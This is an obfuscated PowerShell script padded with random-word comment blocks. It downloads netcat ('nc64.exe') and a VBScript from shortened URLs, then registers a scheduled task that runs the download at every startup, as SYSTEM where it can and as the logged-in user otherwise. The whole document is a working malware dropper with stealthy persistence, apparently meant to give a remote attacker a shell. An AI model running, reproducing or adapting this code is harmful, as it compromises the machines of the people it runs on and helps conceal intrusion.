GTQN0zh907fAnQ8qdeoFv0BArxqWBhu6WQWEwL4dxMn4BVbNiINqLmfPkYan3YfpAdzNX4XJNpIYW4RyGL6XQv = Join-Path $Wmev9pKYTU78Wfy9Bjxtuh1dOwGd02fAfOgW7CirxodVDyaEcY2auMQUwOkzVzGoJtNJikCHbhBxlop3NSaC5tJHXRcpxt4XXrpOOg7WO2heVkZXzfgH8rwFmCboqbQhrZbY5j3JwUBLlsB9a7sMJt0YDHeBDt6Un69O0IrST9UHE0Jb8tw5dIF4exHa0i8GezG4iiwNZRUdZpNfcTGUuAvTg4vrsVQc41rGdXlcZViEneptwFS93JPPjIrM6bS9ppVwCJPxC1JHZ45ukdwv0LNaZa1mYPkpH7ksRNG4pFPrqOESLhBpMXpRfqUkEPYTNaxMLsSTTJKPhVNGOodCKfprqMHL1HtSojTlh9BHxgRLBiaeNaQWvlshZcbWBioWIBNx3OdVORo7FTp9B7OMYvHrK2TFfsou7mbmAdI8NaCKOOFginuT3MHEhmCRZn1SeImnYvVc6ZcWiWVLx3fUom56byLJXc9P0OViH4nsBXzpCrAMCuQ9xy2tpQad "nc64.exe"
$0qh5yVg1NDAk3UOKbGPqx5JlhYweHcNZGm5KEWgMji7Kx7Hx9V1ren7xhfYs6VZlsIfu2vxDyHhYihACj1gw42l4avQXCpgOrNt09Zc63iNlpmGDZr9nhlFxZ8ThJRM2wEJd5sI4t2SoI5MZL7gQYVG3kqFbhwyvofOpCxh8IbyTsvzf0nwvDNhaOx7cDmr5NmO1qaDd3CbyCqmNDSdaQPIFoyD4POzN95N97oiSd9wWkqWxST4xcQ3sCP27VIlF6Y2pSvKzUhurBoD8uAcjd7bUqPrUoOpUUCSMBKTJw8R88iYEZVRIuwGJSByu1ZATbiUgXsb6y2o3gh7Kkoe3NYp5cf0jAGrziC5qKYCbfFVTKM42fCTdPMoewN67802ySD2caeZ = Join-Path $Wmev9pKYTU78Wfy9Bjxtuh1dOwGd02fAfOgW7CirxodVDyaEcY2auMQUwOkzVzGoJtNJikCHbhBxlop3NSaC5tJHXRcpxt4XXrpOOg7WO2heVkZXzfgH8rwFmCboqbQhrZbY5j3JwUBLlsB9a7sMJt0YDHeBDt6Un69O0IrST9UHE0Jb8tw5dIF4exHa0i8GezG4iiwNZRUdZpNfcTGUuAvTg4vrsVQc41rGdXlcZViEneptwFS93JPPjIrM6bS9ppVwCJPxC1JHZ45ukdwv0LNaZa1mYPkpH7ksRNG4pFPrqOESLhBpMXpRfqUkEPYTNaxMLsSTTJKPhVNGOodCKfprqMHL1HtSojTlh9BHxgRLBiaeNaQWvlshZcbWBioWIBNx3OdVORo7FTp9B7OMYvHrK2TFfsou7mbmAdI8NaCKOOFginuT3MHEhmCRZn1SeImnYvVc6ZcWiWVLx3fUom56byLJXc9P0OViH4nsBXzpCrAMCuQ9xy2tpQad "script.vbs"
       
# JpZXEhSrtwktTX ybJxSrxPhY cPmULahNf nvSshS FFWHaWdm qDtSbvyNHA QGwRvBeZxzL GwVft
# cvQQfp YlkBinF EnvbE iMugSRD JfuET eEmlsq SrSANcvoVxHzrH nEfvEmV WmSDFMjGpuAQ EiMUIpusYuG
#     EFVKvozoNJfovL HSBBtCLPmjZUH jBktkEBDykXfko gOQJNtFh CpGznmPbix LIWbqtQLjiKrlPM atOOjWO YRZXiEqckeeJH
#  YRWvHzNJZZZbgJC LSZcuvJ UzlS NmcvxNxwLdtbK
$jNAyqFArf3adtbqz7l9IYLUn2ThEq5HdsPgZvnuEIatS1MZ07FNmtjSpuXK2Jnyk6pIPkew6keOJNmxHpv2CeEedQe8MDxMYYSCEcEyoWo40ku6JbzZgs529YR7S21NrTWqUwiQHUWTwUsvpj0FausmInNobFmXPJ5CxdnmZIDZv8pRoTIG5tKZHFdod2KJQ84E90r4x7cwvLs8uRBN2YvJUbdOqHgJ5MKSQEKjfraxNuR7gJ2lBBwxXZk3XLyUPy1bJO3lG79E5A65KBlCStmAzLllQIhlhdWbk3bRwNgMJwnmBOVc49pNhPpo05eLy0zeOQeZ33ATdcYHY8XLzIhskRQfEmqXcTAovPq6sWjIFSoiOHbJuRH6jOaLcQ1Q7LkJjLqrrfC4JHIogZMyqJBZGH6Y5fgkkm9DAK8Q3Z3eV5tOzAb4tzbq0MPt9IzKvcXgSg8bXg4jDwgiw2LWXH372LJa9Cdly9gnvpeKD4hT3krA3mB59dZRS8zr = "https://rb.gy/mx0i5"
$Qgh1d3P3EnVZUdkMGvA6Bd3WhWSMzDym4rDf73oy4w51OiVPiDulyeuVdW9V8kQ5nTMGs6PR7gD3hiGSi9rH8kN47vF9MZodqKqdHVyrARHhez3z87Fjd8HPQ1vWm2QMuOUsujHMxHcImRtRCqFyiJSte0Bdi01dF6U1VI3oK8c0uyuOYmxvpLW0iaDHnKeI7n3yeisGJCCv1PCS92vtOTIVdg0l0eemjmKCz1WNi54PG4eMoUKB1I79Xuz8QQiGaOcHMo2hlHxqponz0WHBRalWmQkOxYp5PiNWHTxXXW4klAo72l2IkgZx7LUMqR7OOWhlyfANb63xsKgDdHhY8xG4U2DhKvSh9AaSv64f86ii1aEMHUOfVQ8UIMJZoIZtTAiEesqipGSfUcOyH0z5W0MA3UgKLQGP5di6CU1qpbAOpIguv16thQLL2emuQyU7uifgxPSG4LOKGqgk0YgnjFQN3ZCdinm9RlrYzwko6VvChPegDSr3taVzV9M7YH9VJtrBMGuU62pJAseVmjY1zg27Wv0HUQ7zF4M6jFe6jxPtoG88AOtQ3TPdie1K8jzXjGpFqTQ2RnJZ0SPjVqz66TMBETI8t6CbuNuuKd0s7rBqSo06BpUCAGcoqnkZBi60ywEK8Wz3VohoYn74JNqjM28IpgopIvJZXrK9ilAGadcfkXe9bQ2wyCdzLEQgzi83P4iGojFwq5qhBHTiGzlS2KwVIi2t3tid8PVZncNVAYHuQFhWIGUpcWPz2mQR76euYTSBA3BNf0Nf4QX0qJj2dfrSjSeosUfzKeKupUF06rrMFElUNjOv8W1WnGBhwVZuWXwYIZVt1Zsxq4gEVUafZnt8pil = "https://rb.gy/guty9"
   
# lhuacm EVoZzT IrGhpDtBGm FxjjFT knZXrnt rpNSSTUTaaRoYk NIZ PAKaqMVJp sXLugYXCq iNxXVTj
#  AvsEe oxzticJXZcRbjnl lIpVbvd pZtLIrOjoT IFfvryfgarpdmqr ApShGes JQNoYJTp HcHKCMIyydYNGju
#     YyfZr xSblCoNQzlYl UTb bHNyyMpmEATUd UGlTi GxretXoRwO IMLZJAuLUTQQe ZSkoxYJTRGEbWi LIXEZra
# supT lpJMGyzyfVSX rBiAM lIcsDgquX ugomfo pBgHMh IklNdjLBgefMy qEVDMr yqian lwQTE XwrUZZbrv
#     wZYwV ULUSZbOELfHRu XuiOdJIeBBlGK qPlZpLkSFHve eQxDcrucKvuXP vBwhqCeqq HuBaljP nfOYVU bZExgTeLslk
#  fPxnTR SFVS MvEGJ
Invoke-WebRequest -Uri $jNAyqFArf3adtbqz7l9IYLUn2ThEq5HdsPgZvnuEIatS1MZ07FNmtjSpuXK2Jnyk6pIPkew6keOJNmxHpv2CeEedQe8MDxMYYSCEcEyoWo40ku6JbzZgs529YR7S21NrTWqUwiQHUWTwUsvpj0FausmInNobFmXPJ5CxdnmZIDZv8pRoTIG5tKZHFdod2KJQ84E90r4x7cwvLs8uRBN2YvJUbdOqHgJ5MKSQEKjfraxNuR7gJ2lBBwxXZk3XLyUPy1bJO3lG79E5A65KBlCStmAzLllQIhlhdWbk3bRwNgMJwnmBOVc49pNhPpo05eLy0zeOQeZ33ATdcYHY8XLzIhskRQfEmqXcTAovPq6sWjIFSoiOHbJuRH6jOaLcQ1Q7LkJjLqrrfC4JHIogZMyqJBZGH6Y5fgkkm9DAK8Q3Z3eV5tOzAb4tzbq0MPt9IzKvcXgSg8bXg4jDwgiw2LWXH372LJa9Cdly9gnvpeKD4hT3krA3mB59dZRS8zr -OutFile $dXQPgYD3ym9Nc69PRvuEusccn1tYWgLULVRD9if0yu3FlXV6Kf5AFlnvnsvjJ2FjxVhYL9G7p2cNh4M4i0Z3he3oDDbP3ygAeYds4Sh5rz4zxNDfbPBssQDOPUYivJhxpKWELEv3ALiOR0wl00kFLc9YsVvX6kOQmPwhRmLbveJkFBZdtRVMesMRdSzeqHDWM1Fpkjmy3LxGzQrxUZ0USkevydIGlSILs7tN7ECwTBIVTZUC5GcGzHYFhlG5f0JWBA2lrg9hZot99tUZ90szaSbzpY5rxzxOeIB9xs7aASRT4I6A5JhIkGAHslDN0orWSoPmtcMVkRyGpBNoFLPiIVpgrwtOG6uuONWyH9EhrTR8dYlSNSqPsuhXuTxE2yGQhE7i2ch5hZeeKMHhOVulsYghER6I9jzAd1XgEoURmLR5eaLV9R0rObKIEwJm9BoptNCJPohzVi3Scw7GYpbOVq9pbrlKZdrC4BqJI0zDmPvMFJkb8wYv8itL1mvTrvAUXQFRJ4rjsSDFDeE5W0MWK2sJJK4ED0qiZVbmU0z6n1WmBV8zScBnxhu3uiGjiilhRcDIg32BOzds6BPmTvk7G6wlcEecFLYDxtNj7F9linHe4FrB6l2jy0VQR1RxzbbYBjIBDUD4ikpaBb5vLMVEbrezBMtdN8AIDNBPKc7EeSkVHnNEUdSSJ1qjE0I
Invoke-WebRequest -Uri $Qgh1d3P3EnVZUdkMGvA6Bd3WhWSMzDym4rDf73oy4w51OiVPiDulyeuVdW9V8kQ5nTMGs6PR7gD3hiGSi9rH8kN47vF9MZodqKqdHVyrARHhez3z87Fjd8HPQ1vWm2QMuOUsujHMxHcImRtRCqFyiJSte0Bdi01dF6U1VI3oK8c0uyuOYmxvpLW0iaDHnKeI7n3yeisGJCCv1PCS92vtOTIVdg0l0eemjmKCz1WNi54PG4eMoUKB1I79Xuz8QQiGaOcHMo2hlHxqponz0WHBRalWmQkOxYp5PiNWHTxXXW4klAo72l2IkgZx7LUMqR7OOWhlyfANb63xsKgDdHhY8xG4U2DhKvSh9AaSv64f86ii1aEMHUOfVQ8UIMJZoIZtTAiEesqipGSfUcOyH0z5W0MA3UgKLQGP5di6CU1qpbAOpIguv16thQLL2emuQyU7uifgxPSG4LOKGqgk0YgnjFQN3ZCdinm9RlrYzwko6VvChPegDSr3taVzV9M7YH9VJtrBMGuU62pJAseVmjY1zg27Wv0HUQ7zF4M6jFe6jxPtoG88AOtQ3TPdie1K8jzXjGpFqTQ2RnJZ0SPjVqz66TMBETI8t6CbuNuuKd0s7rBqSo06BpUCAGcoqnkZBi60ywEK8Wz3VohoYn74JNqjM28IpgopIvJZXrK9ilAGadcfkXe9bQ2wyCdzLEQgzi83P4iGojFwq5qhBHTiGzlS2KwVIi2t3tid8PVZncNVAYHuQFhWIGUpcWPz2mQR76euYTSBA3BNf0Nf4QX0qJj2dfrSjSeosUfzKeKupUF06rrMFElUNjOv8W1WnGBhwVZuWXwYIZVt1Zsxq4gEVUafZnt8pil -OutFile $WBAj5YQH6XT4ScJZXhUCfRkiwXOcjRN4AhI0mi0LdcCkO8Tt9N8YiuHfNWzu0jYnoJ1lqIk8v2gkUheApM8dM68CD3HnKPSSiwclF9URjQjhDSSt4I7BNFvNdcIaz1YbFuF3qVJV1klQxZ2j6eIoeNukawawtFgRqncvWq9jdpxOvV3S2F6NTgJHgXQBXcfGOLrOUNubNuc4qdCCt74kgLuv91fuWbIajE37zgYoViujVDrD9kvLb1or57ptlH63B8Hdz02x8Wq7hgppXse5lwRWWI8D69KrviMvmOfersT6jR3ZyEiEVS9cUC2tKbMGGP1xsRNah8Z3Wk72eLCMnU7AGidw7RrQMSIn1WS2GAMIdzValm2mmGQDtHFliCeoZp5qYNbMFZ0tcNhup5Lws0Hfg2SKLVop9M7C28c2kF4vTDM1ghr73mmozQRhIbLnvh1fsChohi8qbfesJJykamWggiQM4DUF1HnNGkG2yHEuZACK7SfCaULYakEhsnLz4aHAvnDnH5jhqlZ5FPoYZxFbr8iWVCNjn7yOOYW3FrvBbrKt6EZuO34oi8248tuyudA0Lxwo1s2j5MHJ0fnoeIxLzCirjTeFCRbF7IR9PWTxaH4LiEVbi11AatffQcLbCbGftYob6cLdXdGuBZXWyghriR1ufmEy5EZu7w2YiuV7Bb9okTvqiLpnRhk9gpazJHdcupjHowhIkHFCCX3fIjLO8HLL183TTn3LHGhURAhkF7lx8tRBjJEBwRliqlf4OjhurMjiOtZzyWGSrOpGau5glWaZWNxHKHtpB1KYzCgyPCQSZbBpnPFCEifpRogR1iGsirisKf8aIwbNw10gYGTQN0zh907fAnQ8qdeoFv0BArxqWBhu6WQWEwL4dxMn4BVbNiINqLmfPkYan3YfpAdzNX4XJNpIYW4RyGL6XQv
Invoke-WebRequest -Uri $xky2hqOSNkqBi9g0C6vXAlMqrBPwk4r6S6kzCLfWkTwjg4Yvgp8GbizW6xE6SVqLaSD6Yt9cFY9Zf1GF2FvzC1lPxitqpzHj6aW8kaEnBW83E -OutFile $0qh5yVg1NDAk3UOKbGPqx5JlhYweHcNZGm5KEWgMji7Kx7Hx9V1ren7xhfYs6VZlsIfu2vxDyHhYihACj1gw42l4avQXCpgOrNt09Zc63iNlpmGDZr9nhlFxZ8ThJRM2wEJd5sI4t2SoI5MZL7gQYVG3kqFbhwyvofOpCxh8IbyTsvzf0nwvDNhaOx7cDmr5NmO1qaDd3CbyCqmNDSdaQPIFoyD4POzN95N97oiSd9wWkqWxST4xcQ3sCP27VIlF6Y2pSvKzUhurBoD8uAcjd7bUqPrUoOpUUCSMBKTJw8R88iYEZVRIuwGJSByu1ZATbiUgXsb6y2o3gh7Kkoe3NYp5cf0jAGrziC5qKYCbfFVTKM42fCTdPMoewN67802ySD2caeZ

# uIMMXHV osnsnKpDIk IdvgvUa wsUFdbx noVLjFTDcRuZ hlyypoEAZ TgnkviZnRjtIvcu XePCmdCuZ
#  nfiXM KYKjxHzxnKK DMSsnLUJUYxC eaNF qBApWeHHGKnP tHtpMpYmSZDfy BSeKFLU OChf eIuwdDaPJsuAphF
#   meRc iSzbPhvEHgmg ZLBFFYnCCvQ QBsZkV REBqeACMd KzbhBG iyLLxKZOhpJv hwGbYWE RxGIaQ mgGyy
#    fPLDCRfrn iweAXZ bWJtBTT XOnNBZYpzWi hHpBUocBXZBFY
$qH9e9HrW4cUoSJzx9zXX8T2dGbIiu2xa5uSZtYHTHY4nVUr26ufNl4VL9Cov8z7jg1R5MhWi74sX1V0lyBv6CV2eDJu0WWeOjdWn3AbahzEIkkkaCqmRe2mL3utocF6dqwVd40f3Rg0caW5FD8ZJ1rkoVfnrpioxRwHBGXKVtEd8Mpc4Qhr69PffRycAi4QwIlj2kJNiNYajsgCzH3SdDB1KgQQwA59Auhd7r0Sg6IIbLMUSBwfU9HX3w5sWiFLPNlxxWfOpWhsPAObN5x43u6vDzPCwmiW6FAeZrz7mVDqXVA4PxaWww6DTnVvSssbg5vCzz0OgthT1Ttx6lyAxW2u8815ljkxj1xxbizxrpAqAvNfWPYd25v6YITnJ5LLArzZ3FaWXXTM40yjpUsjhLcLy6mygyvrXo5HXJsRE0X7VWbWH5xbqjXHB2HivQOVhSqoK1jbaQS4zkz8acy72vU4OWp7iuAZBgs5MEuk8pq9L1xJV6sV34wyDk0utI8EmyWiLoZvJM1Z08fwi51PJw8no9V5IqxG6EldBorT98LPzdDCY0PBy4bsEdX7ZMyXNY1cMS8fypLXuawDbDnXhEr4vwunNxUti3PkoWXQQ6QJhn4cUGu4 = New-ScheduledTaskAction -Execute $0qh5yVg1NDAk3UOKbGPqx5JlhYweHcNZGm5KEWgMji7Kx7Hx9V1ren7xhfYs6VZlsIfu2vxDyHhYihACj1gw42l4avQXCpgOrNt09Zc63iNlpmGDZr9nhlFxZ8ThJRM2wEJd5sI4t2SoI5MZL7gQYVG3kqFbhwyvofOpCxh8IbyTsvzf0nwvDNhaOx7cDmr5NmO1qaDd3CbyCqmNDSdaQPIFoyD4POzN95N97oiSd9wWkqWxST4xcQ3sCP27VIlF6Y2pSvKzUhurBoD8uAcjd7bUqPrUoOpUUCSMBKTJw8R88iYEZVRIuwGJSByu1ZATbiUgXsb6y2o3gh7Kkoe3NYp5cf0jAGrziC5qKYCbfFVTKM42fCTdPMoewN67802ySD2caeZ
$oWhp7VvfACIsCNqJ039bH0RX1218OQobiUVjNTdOa4KySSlyF4h9vGjTvllY9AZFsyqFhxhsfSE4N5i7aL9h5J8LOKUrgIYcmQ1GnspvElb8lq42R39gZ6SG7KmC3QLUSVlqfzzjmLI3ks17iMgBOurNBFGEA1ztctAg472yQRNPavQ85mpqoBxU68fv0yrNB0aLeNXtcYEnggBjjZacwzlVbAf7YvYmAvinNd43A8QhYiptnVPZ1xoxe8HBla8pOmySEwzkb3RNMAZAZ8jBo6aBUH6odsEHbum5mEbUG8HZTAuvANIX5GpYlEvyOrWkQ7ZQD77nB8nNSfLvgzaiDcP5FIjRzpRMP3FQR5VajcgNxDu1Ma1znYmnhLOtZWanMPBs5cZNWSWUtSRf6wDplLotBfFqCuykOKMGIYHr1hC4vYU6AtD7t2sJxc8fCTAwsRbauVRra0y = New-ScheduledTaskTrigger -AtStartup
   
if ($xHjDi6QOKmJwL7dBZbv9HT1Tte9vBGtemw30DxVWkHPJS1BOKAfIq3E5YwBcrPEvYUArBYnXWCbpqfdhvpApdjce1ywniih141Ydka9IPcnSefFxurNXsyNBsS5gvaiiVytOBnx3t4A0lXY7Aaj8x7lKMB2QU2DkrEFobpvvValZdtbSZrbD0ldskXkk1LK9NFWXQPz8htv4lFfoCmzrvJrG3bg0nqEXFeSmO52ISc4RJM0eSa5) {
         # huEiojmCSruoibM NuQkbFWqfTck ePmOTzteNJnHCrw XsJn lIj ZvZOXyHkcJvT MwhKbYCha KRVvo
#     ZTHzmn XuxbfNaJapJhO rShcBWQpLK qbbgvQH oIOz gqGaGwK JAbJUjknC zrMxaKuqUab ZfAy CRM bdSzz
#    DRLh VSZYkRGzvx lmvgLFYbppaf TinGN FBGiKuwOIBNKLok czoQRYm VPiVkVMg vpNkAbnDNfElZa uhvWqSaNa
#     hvtjJyMdpm fHBGNsIflcrS cTvofzQhQDPIPlN UPEwHrpiVK noZr dXIRWIt RpfYkePiFZOyye CFfkKKBImNza
#   IwVuiOpmsDG dtRFQlJAi pYkSUubyET txCZPZMNkbVfJB gyPTFJYj pUSBVpXNXDP syhJTCJU tmVYasoRsBIGKF
#   IzcImwL lqBPPSWEBbxTB amawfqF qYyskCGNASwUTpJ uesMwYOkX zMzSdanza wwqYybkszIRzJYl OIq OFrKcKcXiMFwL
#  WDQLqYEbQpEt IFbck raGfNDWWZ Amhj tYPFKDj HObwANsCZpk Eoaks aKttHqCtzoQMBj EDXApfCDIi jmtYYTTzphiGEXR
#  xrVpLRmO epAadZmCAzi XobCOzRbkVGR EvXDsDszGjMOvEs HIHIonIK aYLJkqu Azzr BaiQqrChwWAVmQZ CvnpLQ
#     VVYhSllbFIi oCeobbunaktCcjL YJKxpVBjIc iPxGa Bzvuv AfIdtC RYxeyKSBFwfWdy PLURQNig MdoYkMvtPODbcM
#     tjhBcCA YLnsEgoufnU lnmlNmPuFhU VQt KPEEIDz kLSEIhD taFsZOqhoNbU TkvSkeWwfDBCMZ PdoHnZpGsAgu
#     HTPzAPYTfRBBZ rMqh XKEFCbdh nQtURhlCBThagt EWvVi mhIRa KQoIDTzumDhXIi ULjCYbKes mDPGtfdaSlm zwjtP
#  OIsQllghtcPCq ZzPNjRBWF ZXI sDAMmyyKWmtTS KYWmgjzbzZz ToVfiRbHivR oNiXcE pPfNa XmgeLhFBaDwctU LZuvBjKXUtastA
# diwiPulmIfhUb iBPtRcA DKWtqyyoFJGEw yXmkEnGXAusrFh vzQ THlYImNgsecS xyc cOROG bQTHkCBeEVZiMj vPIKJGnInpY
# nQD pfko usYbDb Ywiu hQRffGjC mnyGVsgbCnKoeN GSZpRKcR RrgwGI jBEdXZ YIs PNZBnbJ SmTEWjP
#  RrnkBd hGm tptHr VUacF UDMTdujJDpZEStw NlYYhPVywMr PvwzzBFFOE YCOXyBOhJkEU pkPulExkk QqPFW
#   QAKd GkuUzMLKn vSRWvwHMqc FOmxLIagEjhMJkb SIEvamztuTVc FHZYiKpdAt wZqsELN dutF dSmGKqcDABndSpF
#  ZtQKwmCgjaYOkJ gwVnqJWYVHYkMV ZqR kYzGyVORiDXOWmp fOPEauz LeGllnZa uKnJz jOxjxLYuy ljhrsFtxRqA UhQrBLV
#   YEcqvquUOFohF kbAiYIFD twr WyhRJexBwD LwkmZaBNKh EwwFyhLIklU jLlWz nrlSPlO yvYHiUE ikSiEQXpXvIhiQ
#  KEliIoliffEZB FHbbXAacBn QzMsop sDhL TUxa ibdtRYvmuRLCEoc RajKxtMeEoKn pihQsqLyDYm IKHZsXgWTfQ
#     dvOLzhFnTBI
         $MMOjbezwzBKIT03o24fqHJZ39kFoqjMLP75gV7ewmtyHkVffFnupeJNLZbTGbuiwHhwFggSgP7jqXUcMGAoqjHGmiz556DwGGl6jPkkSbsLXBHoi9S6yGQjIdCDc0H9BOXadVenf7pHquumWMVS1k3PO6Hcs1GiqDKNf6tIpANGL6GFQhB5dNHIrFjUoSAB02NDbAwmcwaQgpAuYjlfRfAtlBRfrqSVzUQyl4IRMuJXeQx3Zz37QJ9SHfXKcpCAh7zp2AclL5NhKBuSo74orm8ye73heHIuOgfTiYBz0XhId7yfbyte5H6CXDOQvizSCnss3KYRuACdDugc652mz3k8eNkAg2MH9uTjc8cQc6F8YfTTV8pHZrlI30YiauvVsB4JkPwIOwmPeOZcHmJKOdC1srU1GuWcu5OTA4qBtjDKHCrPud6tYdLSNbzHgiSjPZxbdfhHmZHCSqymHFfMsdennG2NJ8chbNUb47CajogBuhPrXBNttAOyxiMAInWxABNThvOuyOeV6iKi9rWUMGoUd3zcNAj8O0pCuv9Ky5ORIBfNGZ7A2QrfE5TLBZBOqXrVk0MFs0nOrUAwp6GgnmnIolO09f3Bh06FP9n1ooeIa67WOjb90mSXESIWnXJFFGOA6Bs2qqZWzGgvLhgrX7iGqsTDcNYcVmDYn3KMGFjoNKEqViCkX2sdM4V6Az68ITPGp1onSSfnLU4V6BKBezn0EvglOAZc6ZsOud8dy7vOzv4plCBB5GIHtnIDoLINiSA6FJ55nWsgX8AAWm42DPiVfdXUB4t1HwMDcBqJndomf3aGmQcXEaM = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY\SYSTEM" -LogonType ServiceAccount
} else {
 # fhRT zDtBWAFEbD qJfYxCx WXBl JTrclIRYeMUCju cgcIvDGjIWVCeO cvZpgxhdIAXr KusFHtlrq
#  ANW ppH nfmAupotLP LteTrKLt bQYVpH Fpryp xalUHMt ifb kxFnjQgqBbt OuEmdYE xyJrcTtCT MuFf
#   FtBsTwRTcqQEB Jiitzaaa ypYmXSnKW lZmT CYuTwIMBHLfqrIG COlwjADm odNSBHjzjMi mAwaAExHNAL CEvjrkSFj
#  KjRWDQyjRupODC
  $MMOjbezwzBKIT03o24fqHJZ39kFoqjMLP75gV7ewmtyHkVffFnupeJNLZbTGbuiwHhwFggSgP7jqXUcMGAoqjHGmiz556DwGGl6jPkkSbsLXBHoi9S6yGQjIdCDc0H9BOXadVenf7pHquumWMVS1k3PO6Hcs1GiqDKNf6tIpANGL6GFQhB5dNHIrFjUoSAB02NDbAwmcwaQgpAuYjlfRfAtlBRfrqSVzUQyl4IRMuJXeQx3Zz37QJ9SHfXKcpCAh7zp2AclL5NhKBuSo74orm8ye73heHIuOgfTiYBz0XhId7yfbyte5H6CXDOQvizSCnss3KYRuACdDugc652mz3k8eNkAg2MH9uTjc8cQc6F8YfTTV8pHZrlI30YiauvVsB4JkPwIOwmPeOZcHmJKOdC1srU1GuWcu5OTA4qBtjDKHCrPud6tYdLSNbzHgiSjPZxbdfhHmZHCSqymHFfMsdennG2NJ8chbNUb47CajogBuhPrXBNttAOyxiMAInWxABNThvOuyOeV6iKi9rWUMGoUd3zcNAj8O0pCuv9Ky5ORIBfNGZ7A2QrfE5TLBZBOqXrVk0MFs0nOrUAwp6GgnmnIolO09f3Bh06FP9n1ooeIa67WOjb90mSXESIWnXJFFGOA6Bs2qqZWzGgvLhgrX7iGqsTDcNYcVmDYn3KMGFjoNKEqViCkX2sdM4V6Az68ITPGp1onSSfnLU4V6BKBezn0EvglOAZc6ZsOud8dy7vOzv4plCBB5GIHtnIDoLINiSA6FJ55nWsgX8AAWm42DPiVfdXUB4t1HwMDcBqJndomf3aGmQcXEaM = New-ScheduledTaskPrincipal -UserId $ENV:UserName -LogonType Interactive
}
    
$f3a47oHbpfsqYrOOwKvYszfR6F6AcYDcFBo3a3mahd15QPHnJ9zscmRUkdAYZKSwvqAhsgUTyo6qVj026yrnK8rN6Bio7m3e1EUP5HCaRfU21SvkxLxKUU8I7NIb4wnRBznhqGPoICF8rlG8j4V2XZ7eu8Dvd4GuyrjFVCa3nhjTe68MGWuZJ1CYJT6ZZjyuAMdKPmh0Ea90r5Rdsul0mHLAdr3Rpir3i8I91iahkItDnALZhsG0LGgoW62I8cDTH26l76Y4bXMSRiN7U2seqfhQSneSHu6Wj4w4OBKL0gQJ7Hnavkre0Pa4RhltCdlJu8uNwTZ6GPsmtm4W6ajLDDl3e9F6rKlxUoWnCWVtmWSgXOHdk37VwyMHq3k8pWKxAVUr4GcV2JEye5P7BkvMIOxh8qIUQyg5M90mHDojSYg5wVmKFk0fy1Rzbx6zCtS1znY3Ky0sEBiNav1MWJWlDZzkjdPNonwqo6wUCxGLxm7CJ57NfJYkPbF0CGE3kURQJUfDs1at9hH1jB61Vdymfz9EvaRVqCzdLsxPcjmzRNXVUBuE903Qn5xFcDXTWI7EIIogFYSXaAqBPhE0EVm6ve2LBXEu9ZQ0QtiJ3sdZjKpXl4PrE6Z = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
   
# VxkCFjXVhz tlWnUYvPju MNspjKAzm OMNkwSGiTSgN RkWSszBl UquboylklQskK toaVplEs MNOTQpBuVwLOqeS
#     vUDvwOwf pfeizOVhiKWEuz InxswaGXAxng KiuKWHk RydaOnvgkzPZ ucYodYRExE eqOUsGn kZdT RBdlIsLjSd
#    BEdLdR GRUDZFIbYpDXg MfJlCcKKZUo VlKBAc MpUVSJqShhvvIe jlysjUNAX AvMzZNLRXyQg xZArpo HmA
#     ZYYfLMA LnpeVingIUz KzPlgAdKy XvLOHUFWKFffPlV jZyeJypflSdyvU aFbrUUIYJKjMi YFiqntsUZuMsb
#     UhFeHMIGYdOEnH NqqugcKZywCmsb LysplDhzq qTfhpfIYFt xVRFyJw bwMBxH hBgAeJCGaZHDS ZhWlRtCTnOo lpwf
#     EgIuy isfcafxBNf qozgYRVWILWd VZbxERwI lZzbgqVQqZD xHIegEbO hebbgRrPfi ohLMhhVH qKKP TteehSTgGskTL
#  NLGIagzMnlDR uVNaDN JLYDAelgVi iYgJZbuxMdjg MPVSXYy vQLNZmxmeJzMcAd kedsi TfvoOIna lndYstDszbFh
#    eTbOzEIF UcSUimzCZEThnP XRala BrrNsCevQIgo OMGO GOhy ouYRBbbTUbX gxPNdpklxqhL vVm RhhKdJCSnWG
# YHMYOGTYVaEVClK RjuVbZQI NmiuUGQp kXLT yBBGxnSVRBEfqB kOsafpMfkuki drPdPvKRqH MZKNwDLTH PcevytWynPS
#     YFywPruGiBOI GvRyxkBNhWcbBcj yyejcDPlCxDB aoUtTKN tDGV vLqNoal OejYemSQ PEQb Sdh LaN ndgahqxrxC
#    juyx YuII jAtUGeAnHIIbtiG OkDqBhw GgJF kuhwKcKHArDfPQG rgkl OCODeUfMCJ urdEwRBkdP rArkmpbF
#    UApPgCeg NjPC HsmkzT BMiJVEI rwGbyriUKGo TNQeYwOppubPAqE eNMnS zSd PnAlsUkHHwOz bFqQMPTwKCqOElN
# rKWhgnrcOOtnHYt UQeB JtjNm ZNlFHXSU tfj iYCsJxiU QViiCSuVH CSB VzJjsYUGCs hXsXLXi UKNzvqEo KgcvAetF
#    yPZbyzATGNubrd OtQUcLyyx ldrShZHeXZpQ oQjQnceNeyNwTa MIIiqtNUtt lOdrtl nONyPZLLODEZm TqUkwIxqiczd
#   oQSSkyRmeb RqekqdrVSrPI Atekp PBAdMaWqYWZgDOc aSgFtgkGENGF UNAHxSyhWCe xWfNYPuwinXI FpjHboyhJgKoxq
#    eWA MXPlabQSkOsxBJ CzhHx KgIhLAlFyg xptwqcyaLLQBIN zyReT ZUGSRiyUkQZ SfInBEje ogkeuhVqcQoJ
#  lOtWKOVgHV SyMOkOR dvVlozr igc ZNsiGcrIC MtxvvXIjTTrmT XtAdvux jyOSFeuK HVzxEDHhAH bDismYNRQijrSL
#     NWD WRTwuzPoY wkJdsTm LoQduyuPrKFCzV KNSUXJIagOG noaqJxern fqCBbbBItdBsNE EENklyAru UpmLfpL
# IAhiRV yuYmLUMCc jiwGocxkkz SFy UXaDAYlAxS mSsAutc yRdbh DBQ SMgmTgyBATDT WvIVnSPAkAbSKq
#     ZkPDCUjJfQeVTcQ
